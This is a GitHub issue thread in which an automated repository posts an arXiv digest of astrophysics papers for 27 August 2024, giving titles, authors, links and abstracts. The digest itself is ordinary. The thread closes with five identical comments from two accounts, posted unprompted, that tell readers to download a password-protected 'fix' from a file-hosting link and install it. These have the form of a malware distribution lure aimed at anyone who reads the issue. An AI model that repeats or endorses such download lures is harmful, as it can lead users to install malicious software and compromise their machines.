### ISSUE TITLE
New submissions for Tuesday, 27 August 2024

### ISSUE THREAD

**Issue by olozhika** [olozhika/ArXivDaily_StarFormation#375]
# New submissions for Tuesday, 27 August 2024
Auto update Star Formation & Molecular Cloud papers at about 2:30am UTC (10:30am Beijing time) every weekday.

阅读 `Usage.md`了解如何使用此repo实现个性化的Arxiv论文推送

See `Usage.md` for instructions on how to personalize the repo. 

Keyword list: ['star formation', 'star-forming', 'molecular cloud', 'interstellar medium', 'cloud', 'clump', 'core', 'filament', 'atomic gas', 'N-PDF']

Excluded: ['galaxies', 'galaxy cluster', ' AGN ']

#### Finding the Fuse: Prospects for the Detection and Characterization of Hydrogen-Rich Core-Collapse Supernova Precursor Emission with the LSST
 - **Authors:** A. Gagliano, E. Berger, V. A. Villar, D. Hiramatsu, R. Kessler, T. Matsumoto, A. Gilkis, E. Laplace
 - **Subjects:** Subjects:
High Energy Astrophysical Phenomena (astro-ph.HE)
 - **Arxiv link:** https://arxiv.org/abs/2408.13314

 - **Pdf link:** https://arxiv.org/pdf/2408.13314

 - **Abstract**
 Enhanced emission in the months to years preceding explosion has been detected for several core-collapse supernovae (SNe). Though the physical mechanisms driving the emission remain hotly debated, the light curves of detected events show long-lived ($\geq$50 days), plateau-like behavior, suggesting hydrogen recombination may significantly contribute to the total energy budget. The Vera C. Rubin Observatory's Legacy Survey of Space and Time (LSST) will provide a decade-long photometric baseline to search for this emission, both in binned pre-explosion observations after an SN is detected and in single-visit observations prior to the SN explosion. In anticipation of these searches, we simulate a range of eruptive precursor models to core-collapse SNe and forecast the discovery rates of these phenomena in LSST data. We find a detection rate of ~40-130 yr$^{-1}$ for SN IIP/IIL precursors and ~110 yr$^{-1}$ for SN IIn precursors in single-epoch photometry. Considering the first three years of observations with the effects of rolling and observing triplets included, this number grows to a total of 150-400 in binned photometry, with the highest number recovered when binning in 100-day bins for 2020tlf-like precursors and in 20-day bins for other recombination-driven models from the literature. We quantify the impact of using templates contaminated by residual light (from either long-lived or separate precursor emission) on these detection rates, and explore strategies for estimating baseline flux to mitigate these issues. Spectroscopic follow-up of the eruptions preceding core-collapse SNe and detected with LSST will offer important clues to the underlying drivers of terminal-stage mass loss in massive stars.
#### Four HD 209458 b transits through CRIRES+: Detection of H$_2$O and non-detections of C$_2$H$_2$, CH$_4$, and HCN
 - **Authors:** D. Blain, R. Landman, P. Mollière, J. Dittmann
 - **Subjects:** Subjects:
Earth and Planetary Astrophysics (astro-ph.EP)
 - **Arxiv link:** https://arxiv.org/abs/2408.13536

 - **Pdf link:** https://arxiv.org/pdf/2408.13536

 - **Abstract**
 HD 209458 b is one of the most studied exoplanets to date. Despite this, atmospheric characterisation studies yielded inconsistent species detections and abundances. Values reported for the C/O ratio range from 0.1 to 1.0. Of particular interest is the simultaneous detection of H2O and HCN reported by some studies using high-resolution ground-based observations, which would require the atmospheric C/O ratio to be fine-tuned to a narrow interval around 1. HCN has however not been detected from recent space-based observations. We aim to provide an independent study of HD 209458 b's atmosphere with high-resolution observations, in order to infer the presence of several species, including H2O and HCN. We observed four primary transits of HD 209458 b at a high resolution (R=92000) with CRIRES+ in the near infrared (band H, 1.4--1.8 um). After reducing the data with pycrires, we prepared the data using the SysRem algorithm and performed a cross-correlation (CCF) analysis of the transmission spectra. We also compared the results with those obtained from simulated datasets constructed by combining the Exo-REM self-consistent model with the petitRADTRANS package. Combining the four transits, we detect H2O with a signal-to-noise CCF metric of 8.7. This corresponds to a signal emitted at $K_p=151.3^{+31.1}_{-23.4}$ km/s and blueshifted by $-6^{+1}_{-2}$ km/s, consistent with what is expected for HD 209458 b. We do not detect any other species among C2H2, CH4, CO, CO2, H2S, HCN, and NH3. Comparing this with our simulated datasets, this result is consistent with a C/O ratio of 0.1 and an opaque cloud top pressure of 50 Pa, at a 3 times solar metallicity. This would also be consistent with recent JWST observations. However, none of the simulated results obtained with a bulk C/O ratio of 0.8, a value suggested by previous studies using GIANO-B and CRIRES, are consistent with our observations.
#### MASTER OT J030227.28+191754.5: an unprecedentedly energetic dwarf nova outburst
 - **Authors:** Yusuke Tampo, Taichi Kato, Keisuke Isogai, Mariko Kimura, Naoto Kojiguchi, Daisaku Nogami, Junpei Ito, Masaaki Shibata, Masayuki Yamanaka, Kenta Taguchi, Hiroyuki Maehara, Hiroshi Itoh, Katsura Matsumoto, Momoka Nakagawa, Yukitaka Nishida, Shawn Dvorak, Katsuhiro L. Murata, Ryohei Hosokawa, Yuri Imai, Naohiro Ito, Masafumi Niwano, Shota Sato, Ryotaro Noto, Ryodai Yamaguchi, Malte Schramm, Yumiko Oasa, Takahiro Kanai, Yu Sasaki, Tamás Tordai, Tonny Vanmunster, Seiichiro Kiyota, Nataly Katysheva, Sergey Yu. Shugarov, Alexandra M. Zubareva, Sergei Antipin, Natalia Ikonnikova, Alexandr Belinski, Pavol A. Dubovsky, Tomáš Medulka, Jun Takahashi, Masaki Takayama, Tomohito Ohshima, Tomoki Saito, Miyako Tozuka, Shigeyuki Sako, Masaomi Tanaka, Nozomu Tominaga, Takashi Horiuchi, Hidekazu Hanayama, Daniel E. Reichart, Vladimir V. Kouprianov, James W. Davidson Jr, Daniel B. Caton, Filipp D. Romanov, David J. Lane, Franz-josef Hambsch, Norio Narita, Akihiko Fukui, Masahiro Ikoma, Motohide Tamura, Koji S. Kawabata, Tatsuya Nakaoka, Ryo Imazawa
 - **Subjects:** Subjects:
Solar and Stellar Astrophysics (astro-ph.SR)
 - **Arxiv link:** https://arxiv.org/abs/2408.13783

 - **Pdf link:** https://arxiv.org/pdf/2408.13783

 - **Abstract**
 We present a detailed study of the MASTER OT J030227.28+191754.5 outburst in 2021-2022, reaching an amplitude of 10.2 mag and a duration of 60 d. The detections of (1) the double-peaked optical emission lines, and (2) the early and ordinary superhumps, established that MASTER OT J030227.28+191754.5 is an extremely energetic WZ Sge-type dwarf nova (DN). Based on the superhump observations, we obtained its orbital period and mass ratio as 0.05986(1) d and 0.063(1), respectively. These are within a typical range of low-mass-ratio DNe. According to the binary parameters derived based on the thermal-tidal instability model, our analyses showed that (1) the standard disk model requires an accretion rate $\simeq$ 10$^{20}$ g s$^{-1}$ to explain its peak optical luminosity and (2) large mass was stored in the disk at the outburst onset. These cannot be explained solely by the impact of its massive ($\gtrsim$ 1.15 M$_\odot$) primary white dwarf implied by Kimura et al. (2023). Instead, we propose that the probable origin of this enormously energetic DN outburst is the even lower quiescence viscosity than other WZ Sge-type DNe. This discussion is qualitatively valid for most possible binary parameter spaces unless the inclination is low ($\lesssim 40^\circ$) enough for the disk to be bright explaining the outburst amplitude. Such low inclinations, however, would not allow detectable amplitude of early superhumps in the current thermal-tidal instability model. The optical spectra at outburst maximum showed the strong emission lines of Balmer, He I, and He II series whose core is narrower than $\sim 800$ km s$^{-1}$. Considering its binary parameters, a Keplerian disk cannot explain this narrow component, but the presumable origin is disk winds.
#### DIES: Parallel dust radiative transfer program with the immediate re-emission method
 - **Authors:** Mika Juvela
 - **Subjects:** Subjects:
Instrumentation and Methods for Astrophysics (astro-ph.IM)
 - **Arxiv link:** https://arxiv.org/abs/2408.13807

 - **Pdf link:** https://arxiv.org/pdf/2408.13807

 - **Abstract**
 Radiative transfer (RT) modelling is a necessary tool in the interpretation of observations of the thermal emission of interstellar dust. It is also often part of multi-physics modelling. In this context, the efficiency of radiative transfer calculations is important, even for one-dimensional models. We investigate the use of the so-called immediate re-emission (IRE) method for fast calculation of one-dimensional spherical cloud models. We wish to determine whether weighting methods similar to those used in traditional Monte Carlo simulations can speed up the estimation of dust temperature. We present the program DIES, a parallel implementation of the IRE method, which makes it possible to do the calculations also on graphics processing units (GPUs). We tested the program with externally and internally heated cloud models, and examined the potential improvements from the use of different weighted sampling schemes. The execution times of the program compare favourably with previous programs, especially when run on GPUs. On the other hand, weighting schemes produce only limited improvements. In the case of an internal radiation source, the basic IRE method samples the re-emission well, while traditional Monte Carlo requires the use of spatial importance sampling. Some noise reduction could be achieved for externally heated models by weighting the initial photon directions. Only in optically very thin models does weighting - such as the proposed method of forced first interaction - result in noise reduction by a factor of several. The IRE method performs well for both internally and externally heated models, typically without the need for any additional weighting schemes. With run times of the order of one second for our test models, the DIES program is suitable even for larger parameter studies.
#### The long-term influence of a magnetar power in stripped-envelope supernovae. Radiative-transfer modeling of He-star explosions from 1 to 10 years
 - **Authors:** Luc Dessart
 - **Subjects:** Subjects:
High Energy Astrophysical Phenomena (astro-ph.HE); Solar and Stellar Astrophysics (astro-ph.SR)
 - **Arxiv link:** https://arxiv.org/abs/2408.13844

 - **Pdf link:** https://arxiv.org/pdf/2408.13844

 - **Abstract**
 Much interest surrounds the nature of the compact remnant formed in core collapse supernovae (SNe). One means to constrain its nature is to search for signatures of power injection from the remnant in the SN observables years after explosion. In this work, we conduct a large grid of 1D nonlocal thermodynamic equilibrium radiative transfer calculations of He-star explosions under the influence of magnetar-power injection from post-explosion age of about one to ten years. Our results for SN observables vary with He-star mass, SN age, injected power, or ejecta clumping. At high mass, the ejecta coolants are primarily O and Ne, with [OI]6330A, [OII]7325A, and [OIII]5000A dominating in the optical, and with strong [NeII]12.81micron in the infrared -- this line may carry more than half the total SN luminosity. For lower He-star masses, a greater diversity of coolants appear, in particular Fe, S, Ar, or Ni from the Si- and Fe-rich regions. All models tend to rise in ionization in time, with twice-ionized species (i.e., OIII, NeIII, SIII, or FeIII) dominating at ~10yr, although this ionization is significantly reduced if clumping is introduced. Our treatment of magnetar power in the form of high-energy electrons or X-ray irradiation yields similar results -- no X-rays emerge from our ejecta even at ten years because of high-optical depth in the keV range. An uncertainty of our work concerns the power deposition profile, which is not known from first principles, although this profile could be constrained from observations. Our magnetar-powered model he8p00 with moderate clumping yields a good match to the optical and near-infrared observations of Type Ib SN2012au at both ~300d (power of 1-2x10^41erg/s) and 2269d (power of 10^40erg/s). Unless overly ionized, we find that all massive magnetar-powered ejecta should be infrared luminous at 5-10yr through strong [NeII]12.81micron line emission.
#### Implications of Fermionic Dark Matter Interactions on Anisotropic Neutron Stars
 - **Authors:** Premachand Mahapatra, Chiranjeeb Singha, Ayush Hazarika, Prasanta Kumar Das
 - **Subjects:** Subjects:
Cosmology and Nongalactic Astrophysics (astro-ph.CO); High Energy Astrophysical Phenomena (astro-ph.HE); General Relativity and Quantum Cosmology (gr-qc)
 - **Arxiv link:** https://arxiv.org/abs/2408.14020

 - **Pdf link:** https://arxiv.org/pdf/2408.14020

 - **Abstract**
 The presence of Dark matter (DM) within a neutron star (NS) can substantially influence the macroscopic properties. It is commonly assumed that the pressure inside an NS is isotropic, but in reality, pressure is locally anisotropic. This study explores the properties of anisotropic NS with a subfraction of DM (isotropic) trapped inside. Implementing a two-fluid formalism with three Equations of State (EOS): AP3 (a realistic nucleon-nucleon interaction model), BSk22 (modeling atomic nuclei and neutron-matter), and MPA1 (considering relativistic effects in nuclear interactions). The properties of NS, such as mass ($M$), radius ($R$), and dimensionless tidal deformability ($\Lambda$), for various DM-anisotropic configurations, have been rigorously tested against observational constraints. These constraints include data from the binary NS merger GW170817, NICER x-ray measurements, and pulsar mass-radius observations. We observe that with increasing DM subfraction, higher anisotropies could also satisfy the observational constraints. Furthermore, increasing the coupling ($g$) between DM and its mediator leads to the formation of a core-halo structure, with a DM halo surrounding the baryonic matter (BM). Specifically, for coupling values of $g = 10^{-4}$, $10^{-3.7}$, and $10^{-3.5}$, we observe that the maximum radius ($R_{max}$) decreases with increasing anisotropy, which contrasts with the behavior at $g = 10^{-5}$ and in scenarios with no DM. Our analysis indicates that binary pulsar systems could potentially constrain the extent of admixed anisotropic NS or, more optimistically, provide evidence for the existence of DM-admixed anisotropic NS.
#### Morphology of molecular clouds at kiloparsec scale in the Milky Way: Shear-induced alignment and vertical confinement
 - **Authors:** Yi-Heng Xie, Guang-Xing Li, Bing-Qiu Chen
 - **Subjects:** Subjects:
Astrophysics of Galaxies (astro-ph.GA)
 - **Arxiv link:** https://arxiv.org/abs/2408.14095

 - **Pdf link:** https://arxiv.org/pdf/2408.14095

 - **Abstract**
 The shape of the cold interstellar molecular gas is determined by several processes, including self-gravity, tidal force, turbulence, magnetic field, and galactic shear. Based on the 3D dust extinction map derived by Vergely et al., we identify a sample of 550 molecular clouds (MCs) within $3\hspace{0.2em}\rm kpc$ of the solar vicinity in the Galactic disk. Our sample contains clouds whose size ranges from pc to kiloparsec, which enables us to study the effect of Galactic-scale processes, such as shear, on cloud evolution. We find that our sample clouds follow a power-law mass-size relation of $M\propto 32.00\hspace{0.2em}{R_{\rm{max}}}^{1.77}$, $M\propto 20.59\hspace{0.2em}{R_S}^{2.04}$ and $M\propto 14.41\hspace{0.2em}{R_V}^{2.29}$, where $R_{\rm{max}}$ is the major axis-based cloud radius, $R_S$ is the area-based radius, and $R_V$ is the volume-based radius, respectively. These clouds have a mean constant surface density of $\sim 7 \hspace{0.2em} \rm {M_{\odot}pc^{-2}}$, and follow a volume density-size relation of $\rho \propto 2.60\hspace{0.2em}{R_{\rm{max}}}^{-0.55}$. As cloud size increases, their shapes gradually transition from ellipsoidal to disk-like to bar-like structures. Large clouds tend to have a pitch angle of $28^{\circ} - 45^{\circ}$, where the angle is measured concerning the Galactic tangential direction. These giant clouds also tend to stay parallel to the Galactic disk plane and are confined within the Galactic molecular gas disk. Our results show that large molecular clouds in the Milky Way can be shaped by Galactic shear and confined in the vertical direction by gravity.
#### Soft X-ray emission from the classical nova AT 2018bej
 - **Authors:** A. Tavleev, L. Ducci, V. F. Suleimanov, C. Maitra, K. Werner, A. Santangelo, V. Doroshenko
 - **Subjects:** Subjects:
High Energy Astrophysical Phenomena (astro-ph.HE); Solar and Stellar Astrophysics (astro-ph.SR)
 - **Arxiv link:** https://arxiv.org/abs/2408.14171

 - **Pdf link:** https://arxiv.org/pdf/2408.14171

 - **Abstract**
 Classical novae are known to demonstrate a supersoft X-ray source (SSS) state following outbursts, which is associated with residual thermonuclear burning on the white dwarf (WD) surface. During its all-sky survey (eRASS1), the eROSITA telescope onboard the Spectrum-Roentgen-Gamma observatory discovered a bright new SSS, whose position is consistent with the known classical nova AT 2018bej in the Large Magellanic Cloud. There were two eROSITA spectra obtained during eRASS1 and eRASS2 monitoring epochs and one XMM-Newton grating spectrum close to the eRASS1 epoch. We aim to describe the eROSITA and XMM-Newton spectra of AT 2018bej with our local thermodynamic equilibrium (LTE) atmosphere models. We focused on the evolution of the hot WD properties between the eRASS1 and eRASS2 epochs, especially on the change of the carbon abundance. A grid of LTE model atmosphere spectra were calculated for different values of the effective temperature (from $T_{\rm eff}= 525$ to $700\,\rm kK$), surface gravity (six values) and chemical composition with five different values of carbon and nitrogen abundances. Both eRASS1 and XMM $0.3-0.6$ keV spectral analyses yield a temperature of the WD of $T_{\rm eff}{\sim}\,600\, \rm kK$ and a WD radius of $8000-8700\,\rm km$. Simultaneous fitting of the eROSITA spectra for two epochs (eRASS1 and eRASS2) with a common WD mass parameter demonstrates a decrease in $T_{\rm eff}$ accompanied by an increase in the WD radius and a decrease in the carbon abundance. However, these changes are marginal and coincide within errors. The derived WD mass is estimated to be $1.05-1.15\, M_\odot$. We traced a minor evolution of the source on a half-year timescale accompanied by a decrease in carbon abundance and concluded that LTE model atmospheres can be used to analyse the available X-ray spectra of classical novae during their SSS stage.
#### High-Energy Insights from an Escaping Coronal Mass Ejection with Solar Orbiter/STIX Observations
 - **Authors:** Laura A. Hayes, Säm Krucker, Hannah Collier, Daniel Ryan
 - **Subjects:** Subjects:
Solar and Stellar Astrophysics (astro-ph.SR)
 - **Arxiv link:** https://arxiv.org/abs/2408.14194

 - **Pdf link:** https://arxiv.org/pdf/2408.14194

 - **Abstract**
 Solar eruptive events, including solar flares and coronal mass ejections (CMEs), are typically characterised by energetically significant X-ray emissions from flare-accelerated electrons and hot thermal plasmas. Occulted events, where the main flare is blocked by the solar limb, provide an opportunity to observe and analyse the X-ray emissions specifically associated with CMEs. This study investigates the X-ray and extreme ultraviolet (EUV) emissions associated with a large filament eruption and CME that occurred on February 15, 2022. This event was highly occulted from the three vantage points of Solar Orbiter, STEREO-A, and Earth. We utilised X-ray observations from the Spectrometer/Telescope for Imaging X-rays (STIX) and EUV observations from the Full Sun Imager (FSI) of the Extreme Ultraviolet Imager (EUI) on-board Solar Orbiter, supplemented by multi-viewpoint observations from STEREO-A/EUVI. This enabled a comprehensive analysis of the X-ray emissions in relation to the filament structure observed in EUV. We used STIX's imaging and spectroscopy capabilities to characterise the X-ray source associated with the eruption. Our analysis reveals that the X-ray emissions associated with the occulted eruption originated from an altitude exceeding 0.3Rsun above the main flare site. The X-ray time-profile showed a sharp increase and exponential decay, and consisted of both a hot thermal component at 17 MK and non-thermal emissions (>11.4 keV) characterised by an electron spectral index of 3.9. Imaging analysis showed an extended X-ray source that coincided with the EUV emission as observed from EUI, and was imaged until the source grew to a size larger than the imaging limit of STIX (180 arcsec). The findings demonstrate that STIX combined with EUI provides a unique and powerful tool for examining the energetic properties of the CME component of solar energetic eruptions.
#### Efficiently Searching for Close-in Companions around Young M Dwarfs using a Multi-year PSF Library
 - **Authors:** Aniket Sanghi, Jerry Xuan, Jason Wang, Dimitri Mawet, Brendan Bowler, Henry Ngo, Marta Bryan, Garreth Ruane, Olivier Absil, Elsa Huby
 - **Subjects:** Subjects:
Earth and Planetary Astrophysics (astro-ph.EP); Instrumentation and Methods for Astrophysics (astro-ph.IM); Solar and Stellar Astrophysics (astro-ph.SR)
 - **Arxiv link:** https://arxiv.org/abs/2408.14268

 - **Pdf link:** https://arxiv.org/pdf/2408.14268

 - **Abstract**
 We present Super-RDI, a unique framework for the application of reference star differential imaging (RDI) to Keck/NIRC2 high-contrast imaging observations with the vortex coronagraph. Super-RDI combines frame selection and signal-to-noise ratio (S/N) optimization techniques with a large multi-year reference point spread function (PSF) library to achieve optimal PSF subtraction at small angular separations. We compile a $\sim$7000 frame reference PSF library based on a set of 288 new Keck/NIRC2 $L'$ sequences of 237 unique targets acquired between 2015 and 2019 as part of two planet-search programs, one focusing on nearby young M dwarfs and the other targeting members of the Taurus star-forming region. For our dataset, synthetic companion injection-recovery tests reveal that frame selection with the mean-squared error (MSE) metric combined with KLIP-based PSF subtraction using 1000-3000 frames and $<$500 principal components yields the highest average S/N for injected synthetic companions. We uniformly reduce targets in the young M-star survey with both Super-RDI and angular differential imaging (ADI). For the typical parallactic angle rotation of our dataset ($\sim$10$^\circ$), Super-RDI performs better than a widely used implementation of ADI at separations $\lesssim$0.4" ($\approx$5 $\lambda$/$D$) gaining an average of 0.25 mag in contrast at 0.25" and 0.4 mag in contrast at 0.15". This represents a performance improvement in separation space over RDI with single-night reference star observations ($\sim$100 frame PSF libraries) applied to a similar Keck/NIRC2 dataset in previous work. We recover two known brown dwarf companions and provide detection limits for 155 targets in the young M-star survey. Our results demonstrate that increasing the PSF library size with careful selection of reference frames can improve the performance of RDI with the Keck/NIRC2 vortex coronagraph in $L'$.
#### SO as shock tracer in protoplanetary disks: the AB Aurigae case
 - **Authors:** A. Dutrey, E. Chapillon, S. Guilloteau, Y.W. Tang, A.Boccaletti, L.Bouscasse, Th. Collin-Dufresne, E. Di Folco, A. Fuente, V.Piétu, P. Rivière-Marichalar, D.Semenov
 - **Subjects:** Subjects:
Earth and Planetary Astrophysics (astro-ph.EP); Solar and Stellar Astrophysics (astro-ph.SR)
 - **Arxiv link:** https://arxiv.org/abs/2408.14276

 - **Pdf link:** https://arxiv.org/pdf/2408.14276

 - **Abstract**
 {Sulfur Monoxide is known to be a good shock tracer in molecular clouds and protostar environments, but its abundance is difficult to reproduce even using state-of-the-art astrochemical models. } {We investigate the properties of the observed SO emission in the protoplanetary disk of AB Auriga, a Herbig Ae star of 2.4 $\Msun$ located at 156 pc. The AB Aur system is unique because it exhibits a dust trap and at least one young putative planet orbiting at about 30 au from the central star.} {We reduced ALMA archival data (projects 2019.1.00579.S, 2021.1.00690.S and 2021.1.01216.S) and analyzed the three detected SO lines (SO $6_5-5_4$, $6_7-5_6$ and $5_6-4_5$). We also present C$^{17}$O and C$^{18}$O 2-1 data to complement the interpretation of the SO data.} {For the three SO lines, the maximum SO emission in the ring is not located in the dust trap. Moreover, the inner radius of the SO ring is significantly larger than the CO emission inner radius, $\sim 160$ au versus $\sim 90$ au. The SO emission traces gas located in part beyond the dust ring. This emission likely originates from shocks at the interface of the outer spirals, observed in CO and scattered light emission, and the molecular and dust ring. SO is also detected inside the cavity, at a radius $\sim 20-30$ au and with a rotation velocity compatible with the proto-planet P1. We speculate that this SO emission originates from accretion shocks onto the circumplanetary disk of the putative proto-planet P1.} {These observations confirm that SO is a good tracer of shocks in protoplanetary disks and could be a powerful, new tool to detect embedded (proto-)planets.} Conclusions. These observations confirm that SO is a good tracer of shocks in protoplanetary disks and could be a powerful, new tool to detect embedded (proto-)planets.
#### The XRISM First Light Observation: Velocity Structure and Thermal Properties of the Supernova Remnant N132D
 - **Authors:** XRISM Collaboration
 - **Subjects:** Subjects:
High Energy Astrophysical Phenomena (astro-ph.HE)
 - **Arxiv link:** https://arxiv.org/abs/2408.14301

 - **Pdf link:** https://arxiv.org/pdf/2408.14301

 - **Abstract**
 We present an initial analysis of the XRISM first-light observation of the supernova remnant (SNR) N132D in the Large Magellanic Cloud. The Resolve microcalorimeter has obtained the first high-resolution spectrum in the 1.6-10 keV band, which contains K-shell emission lines of Si, S, Ar, Ca, and Fe. We find that the Si and S lines are relatively narrow, with a broadening represented by a Gaussian-like velocity dispersion of $\sigma_v \sim 450$ km s$^{-1}$. The Fe He$\alpha$ lines are, on the other hand, substantially broadened with $\sigma_v \sim 1670$ km s$^{-1}$. This broadening can be explained by a combination of the thermal Doppler effect due to the high ion temperature and the kinematic Doppler effect due to the SNR expansion. Assuming that the Fe He$\alpha$ emission originates predominantly from the supernova ejecta, we estimate the reverse shock velocity at the time when the bulk of the Fe ejecta were shock heated to be $-1000 \lesssim V_{\rm rs}~[{\rm km s}^{-1}] \lesssim 3300$ (in the observer frame). We also find that Fe Ly$\alpha$ emission is redshifted with a bulk velocity of $\sim 890$ km s$^{-1}$, substantially larger than the radial velocity of the local interstellar medium surrounding N132D. These results demonstrate that high-resolution X-ray spectroscopy is capable of providing constraints on the evolutionary stage, geometry, and velocity distribution of SNRs.
#### Can supernova from runaway stars mimic the signs of absorbing `super-virial' gas?
 - **Authors:** Mukesh Singh Bisht (1), Projjwal Banerjee (2), Biman B. Nath (1), Yuri Shchekinov (1) ((1) Raman Research Institute, Bengaluru - 560080, India, (2) Department of Physics, Indian Institute of Technology Palakkad, Kerala, India)
 - **Subjects:** Subjects:
Astrophysics of Galaxies (astro-ph.GA); High Energy Astrophysical Phenomena (astro-ph.HE)
 - **Arxiv link:** https://arxiv.org/abs/2408.14351

 - **Pdf link:** https://arxiv.org/pdf/2408.14351

 - **Abstract**
 The recent detection of large column density absorption lines from highly ionized gas in a few directions through the circumgalactic medium (CGM) of the Milky Way (MW) has been puzzling. The inferred temperature from these absorption lines far exceeds the virial temperature of the MW, and the column densities are also too large to be easily explained. In this paper, we propose a novel idea to explain these observations and claim that they may not have originated from the CGM, but from a totally different type of source, namely, stellar ejecta from supernovae (SNe) above the Galactic disk that happen to lie in the line of sight to the background quasars. About $\sim 20\%$ of massive OB stars (progenitors of core-collapse supernovae) are known to be runaway stars that have high ejection velocities near the Galactic plane and can end up exploding as SNe above the Galactic disk. We show that the associated reverse shock in the supernova remnant in the early non-radiative phase can heat the ejecta to temperatures of $\gtrsim 10^7\,{\rm K}$ and can naturally explain the observed high column density of ions in the observed `super-virial' phase along with $\alpha$-enriched super-solar abundance that is typical of core-collapse supernovae. However, SNe from runaway stars has a covering fraction of $\lesssim 0.7 \%$ and thus can only explain the observations along limited sightlines.
#### Eighteen new fast radio bursts in the High Time Resolution Universe survey
 - **Authors:** M. Trudu, A. Possenti, M. Pilia, M. Bailes, E. F. Keane, M. Kramer, V. Balakrishnan, S. Bhandari, N. D. R. Bhat, M. Burgay, A. Cameron, D. J. Champion, A. Jameson, S. Johnston, M. J. Keith, L. Levin, C. Ng, R. Sengar, C. Tiburzi
 - **Subjects:** Subjects:
High Energy Astrophysical Phenomena (astro-ph.HE)
 - **Arxiv link:** https://arxiv.org/abs/2408.14384

 - **Pdf link:** https://arxiv.org/pdf/2408.14384

 - **Abstract**
 Current observational evidence reveals that fast radio bursts (FRBs) exhibit bandwidths ranging from a few dozen MHz to several GHz. Traditional FRB searches primarily employ matched filter methods on time series collapsed across the entire observational bandwidth. However, with modern ultra-wideband receivers featuring GHz-scale observational bandwidths, this approach may overlook a significant number of events. We investigate the efficacy of sub-banded searches for FRBs, a technique seeking bursts within limited portions of the bandwidth. These searches aim to enhance the significance of FRB detections by mitigating the impact of noise outside the targeted frequency range, thereby improving signal-to-noise ratios. We conducted a series of Monte Carlo simulations, for the $400$-MHz bandwidth Parkes 21-cm multi-beam (PMB) receiver system and the Parkes Ultra-Wideband Low (UWL) receiver, simulating bursts down to frequency widths of about $100$\,MHz. Additionally, we performed a complete reprocessing of the high-latitude segment of the High Time Resolution Universe South survey (HTRU-S) of the Parkes-Murriyang telescope using sub-banded search techniques. Simulations reveal that a sub-banded search can enhance the burst search efficiency by $67_{-42}^{+133}$ % for the PMB system and $1433_{-126}^{+143}$ % for the UWL receiver. Furthermore, the reprocessing of HTRU led to the confident detection of eighteen new bursts, nearly tripling the count of FRBs found in this survey. These results underscore the importance of employing sub-banded search methodologies to effectively address the often modest spectral occupancy of these signals.
#### Filamentary Molecular Cloud Formation via Collision-induced Magnetic Reconnection in Cold Neutral Medium
 - **Authors:** Shuo Kong, Rowan J. Smith, David Whitworth, Erika T. Hamden
 - **Subjects:** Subjects:
Astrophysics of Galaxies (astro-ph.GA)
 - **Arxiv link:** https://arxiv.org/abs/2408.14417

 - **Pdf link:** https://arxiv.org/pdf/2408.14417

 - **Abstract**
 We have investigated the possibility of molecular cloud formation via the Collision-induced Magnetic Reconnection (CMR) mechanism of the cold neutral medium (CNM). Two atomic gas clouds with conditions typical of the CNM were set to collide at the interface of reverse magnetic fields. The cloud-cloud collision triggered magnetic reconnection and produced a giant 20pc filamentary structure which was not seen in the control models without CMR. The cloud, with rich fiber-like sub-structures, developed a fully molecular spine at 5Myr. Radiative transfer modeling of dust emission at far infrared wavelengths showed that the middle part of the filament contained dense cores over a span of 5pc. Some of the cores were actively forming stars and typically exhibited both connecting fibers in dust emission and high-velocity gas in CO line emission, indicative of active accretion through streamers. Supersonic turbulence was present in and around the CMR-filament due to inflowing gas moving at supersonic velocities in the collision mid-plane. The shocked gas was condensed and transported to the main filament piece by piece by reconnected fields, making the filament and star formation a bottom-up process. Instead of forming a gravitationally bounded cloud which then fragments hierarchically (top-down) and forms stars, the CMR process creates dense gas pieces and magnetically transports them to the central axis to constitute the filament. Since no turbulence is manually driven, our results suggest that CMR is capable of self-generating turbulence. Finally, the resulting helical field should show field-reversal on both sides of the filament from most viewing angles.

by olozhika (Xing Yuchen). 

2024-08-27

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
